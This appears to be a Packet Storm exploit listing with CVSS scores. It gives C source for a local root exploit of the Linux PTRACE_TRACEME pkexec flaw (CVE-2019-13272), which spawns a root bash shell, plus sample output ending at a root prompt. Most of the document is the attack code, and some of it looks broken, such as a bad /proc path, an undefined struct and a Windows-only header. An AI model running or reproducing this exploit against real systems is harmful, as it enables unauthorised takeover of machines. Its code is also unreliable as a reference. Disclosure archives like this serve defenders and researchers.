Lucene search

K
packetstormUjas DhamiPACKETSTORM:165051
HistoryNov 23, 2021 - 12:00 a.m.

Linux Kernel 5.1.x PTRACE_TRACEME pkexec Local Privilege Escalation

2021-11-2300:00:00
Ujas Dhami
packetstormsecurity.com
392

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

`# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)  
# Date: 11/22/21  
# Exploit Author: Ujas Dhami  
# Version: 4.19 - 5.2.1  
# Platform: Linux  
# Tested on:  
# ~ Ubuntu 19.04 kernel 5.0.0-15-generic  
# ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64  
# ~ Kali Linux kernel 4.19.0-kali5-amd64  
# CVE: CVE-2019-13272  
  
// ....  
// Original discovery and exploit author: Jann Horn  
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903  
// Modified exploit code of: BColes  
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272  
// ....  
// ~ Uses the PolKit_Exec frontend.  
// ~ PolKit_Action is branched.  
// ~ Search is optimized.  
// ~ Trunks attain search priority upon execution.  
// ....  
// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme  
// ujas@kali:~$ ./exploit_traceme  
// Welcome to your Arsenal!  
// accessing variables...  
// execution has reached EOP.  
// familiar trunks are been searched ...  
// trunk helper found: /usr/sbin/mate-power-backlight-helper  
// helper initiated: /usr/sbin/mate-power-backlight-helper  
// SUID process is being initiated (/usr/bin/pkexec) ...  
// midpid is being traced...  
// midpid attached.  
// root@kali:/home/ujas#  
// ....  
  
#include <ctype.h>  
#include <assert.h>  
#include <conio.h>  
#include <stdio.h>  
#include <sys/syscall.h>  
#include <sys/stat.h>  
#include <fcntl.h>  
#include <sched.h>  
#include <stddef.h>  
#include <sys/user.h>  
#include <linux/elf.h>  
#include <stdarg.h>  
#include <pwd.h>  
#include <sys/prctl.h>  
#include <sys/wait.h>  
#include <sys/ptrace.h>  
#include <string.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <signal.h>  
#define _GNU_SOURCE  
  
#define DEBUG  
#ifdef DEBUG  
#define dprintf printf  
#endif  
#define max(a,b) ((a)>(b) ? (a) : (b))  
#define eff(expr) ({ \  
typeof(expr) __res = (expr); \  
if (__res == -1) { \  
dprintf("[-] Error: %s\n", #expr); \  
return 0; \  
} \  
__res; \  
})  
  
struct stat st;  
  
const char *trunk[1024];  
  
const char *trunks_rec[] = {  
"/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",  
"/usr/sbin/mate-power-backlight-helper",  
"/usr/lib/gnome-settings-daemon/gsd-backlight-helper",  
"/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",  
"/usr/lib/unity-settings-daemon/usd-backlight-helper",  
"/usr/bin/xfpm-power-backlight-helper",  
"/usr/bin/lxqt-backlight_backend",  
"/usr/lib/gsd-backlight-helper",  
"/usr/lib/gsd-wacom-led-helper",  
"/usr/lib/gsd-wacom-oled-helper",  
"/usr/libexec/gsd-wacom-led-helper",  
"/usr/libexec/gsd-wacom-oled-helper",  
"/usr/libexec/gsd-backlight-helper",  
  
};  
static int trace_align[2];  
static const char *path_exec = "/usr/bin/pkexec";  
static const char *path_action = "/usr/bin/pkaction";  
static int fd = -1;  
static int pipe_stat;  
static const char *term_sh = "/bin/bash";  
static int mid_succ = 1;  
static const char *path_doublealign;  
  
static char *tdisp(char *fmt, ...) {  
static char overlayfs[10000];  
va_list ap;  
va_start(ap, fmt);  
vsprintf(overlayfs, fmt, ap);  
va_end(ap);  
return overlayfs;  
}  
  
static int middle_main(void *overlayfs) {  
prctl(PR_SET_PDEATHSIG, SIGKILL);  
pid_t middle = getpid();  
fd = eff(open("/proc/_fd/exe", O_RDONLY));  
pid_t child = eff(fork());  
  
if (child == 0) {  
prctl(PR_SET_PDEATHSIG, SIGKILL);  
  
eff(dup2(fd, 42));  
int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));  
char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());  
eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));  
execl(path_exec, basename(path_exec), NULL);  
while (1) {  
char overlayfs[1000];  
ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));  
overlayfs[buflen] = '\0';  
if (strstr(overlayfs, threadv)) break;  
}  
  
dprintf("SUID execution failed.");  
exit(EXIT_FAILURE);  
}  
  
eff(dup2(fd, 0));  
eff(dup2(trace_align[1], 1));  
  
struct passwd *pw = getpwuid(getuid());  
if (pw == NULL) {  
dprintf("err: username invalid/failed to fetch username");  
exit(EXIT_FAILURE);  
}  
  
mid_succ = 1;  
execl(path_exec, basename(path_exec), "--user", pw->pw_name,  
path_doublealign,  
"--help", NULL);  
mid_succ = 0;  
dprintf("err: pkexec execution failed.");  
exit(EXIT_FAILURE);  
}  
  
static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {  
struct user_regs_struct regs;  
struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) };  
eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));  
eff(waitpid(pid, &pipe_stat, 0));  
eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));  
  
unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;  
struct injected_page {  
unsigned long inj_arse[2];  
unsigned long environment[1];  
char arg0[8];  
char path[1];  
} ipage = {  
.inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }  
};  
strcpy(ipage.arg0, arg0);  
for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {  
unsigned long pro_d = ((unsigned long *)&ipage)[i];  
eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),  
(void*)pro_d));  
}  
  
eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));  
eff(ptrace(PTRACE_DETACH, pid, 0, NULL));  
eff(waitpid(pid, &pipe_stat, 0));  
  
regs.orig_rax = __NR_execveat;  
regs.rdi = exec_fd;  
regs.rsi = inject_surface + offsetof(struct injected_page, path);  
regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);  
regs.r10 = inject_surface + offsetof(struct injected_page, environment);  
regs.r8 = AT_EMPTY_PATH;  
}  
  
static int stag_2(void) {  
pid_t child = eff(waitpid(-1, &pipe_stat, 0));  
timeexecbuffer(child, 42, "stage3");  
return 0;  
}  
  
static int sh_spawn(void) {  
eff(setresgid(0, 0, 0));  
eff(setresuid(0, 0, 0));  
execlp(term_sh, basename(term_sh), NULL);  
dprintf("err: Shell spawn unsuccessful.", term_sh);  
exit(EXIT_FAILURE);  
}  
  
static int check_env(void) {  
const char* xdg_session = getenv("XDG_SESSION_ID");  
  
dprintf("accessing variables...\n");  
  
if (stat(path_action, &st) != 0) {  
dprintf("err: pkaction not found at %s.", path_action);  
exit(EXIT_FAILURE);  
}  
if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {  
dprintf("warn: PolKit agent not found.\n");  
return 1;  
}  
if (stat("/usr/sbin/getsebool", &st) == 0) {  
if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {  
dprintf("warn: [deny_ptrace] is enabled.\n");  
return 1;  
}  
}  
if (xdg_session == NULL) {  
dprintf("warn: $XDG_SESSION_ID is not set.\n");  
return 1;  
}  
if (stat(path_exec, &st) != 0) {  
dprintf("err: pkexec not found at %s.", path_exec);  
exit(EXIT_FAILURE);  
}  
  
dprintf("execution has reached EOP.\n");  
  
return 0;  
}  
  
int trunkh() {  
char cmd[1024];  
snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);  
FILE *fp;  
fp = popen(cmd, "r");  
if (fp == NULL) {  
dprintf("err: Failed to run %s.\n", cmd);  
exit(EXIT_FAILURE);  
}  
  
char line[1024];  
char buffer[2048];  
int helper_index = 0;  
int useful_action = 0;  
static const char *threadv = "org.freedesktop.policykit.exec.path -> ";  
int needle_length = strlen(threadv);  
  
while (fgets(line, sizeof(line)-1, fp) != NULL) {  
if (strstr(line, "implicit active:")) {  
if (strstr(line, "yes")) {  
useful_action = 1;  
}  
continue;  
}  
  
if (useful_action == 0)  
continue;  
useful_action = 0;  
  
int length = strlen(line);  
char* found = memmem(&line[0], length, threadv, needle_length);  
if (found == NULL)  
continue;  
  
memset(buffer, 0, sizeof(buffer));  
for (int i = 0; found[needle_length + i] != '\n'; i++) {  
if (i >= sizeof(buffer)-1)  
continue;  
buffer[i] = found[needle_length + i];  
}  
  
if (stat(&buffer[0], &st) != 0)  
continue;  
  
if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||  
strstr(&buffer[0], "/cpugovctl") != 0 ||  
strstr(&buffer[0], "/package-system-locked") != 0 ||  
strstr(&buffer[0], "/cddistupgrader") != 0) {  
dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);  
continue;  
}  
  
trunk[helper_index] = strndup(&buffer[0], strlen(buffer));  
helper_index++;  
  
if (helper_index >= sizeof(trunk)/sizeof(trunk[0]))  
break;  
}  
  
pclose(fp);  
return 0;  
}  
  
int root_ptraceme() {  
dprintf("helper initiated: %s\n", path_doublealign);  
  
eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));  
eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));  
char overlayfs = 0;  
eff(write(trace_align[1], &overlayfs, 1));  
  
dprintf("SUID process is being initiated(%s) ...\n", path_exec);  
static char stackv[1024*1024];  
pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),  
CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));  
if (!mid_succ) return 1;  
while (1) {  
int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);  
char overlayfs[16];  
int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));  
overlayfs[buflen] = '\0';  
*strchrnul(overlayfs, '\n') = '\0';  
if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)  
break;  
usleep(100000);  
}  
  
dprintf("midpid is being traced...\n");  
eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));  
eff(waitpid(midpid, &pipe_stat, 0));  
dprintf("midpid attached.\n");  
  
timeexecbuffer(midpid, 0, "stage2");  
exit(EXIT_SUCCESS);  
}  
  
int main(int argc, char **inj_arse) {  
if (strcmp(inj_arse[0], "stage2") == 0)  
return stag_2();  
if (strcmp(inj_arse[0], "stage3") == 0)  
return sh_spawn();  
  
dprintf("Welcome to your Arsenal!\n");  
  
check_env();  
  
if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {  
exit(0);  
}  
  
dprintf("efficient trunk is being searched...\n");  
trunkh();  
for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {  
if (trunk[i] == NULL)  
break;  
  
if (stat(trunk[i], &st) == 0) {  
path_doublealign = trunk[i];  
root_ptraceme();  
}  
}  
  
dprintf("familiar trunks are been searched ...\n");  
for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {  
if (stat(trunks_rec[i], &st) == 0) {  
path_doublealign = trunks_rec[i];  
dprintf("trunk helper found: %s\n", path_doublealign);  
root_ptraceme();  
}  
}  
  
return 0;  
}  
  
`

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C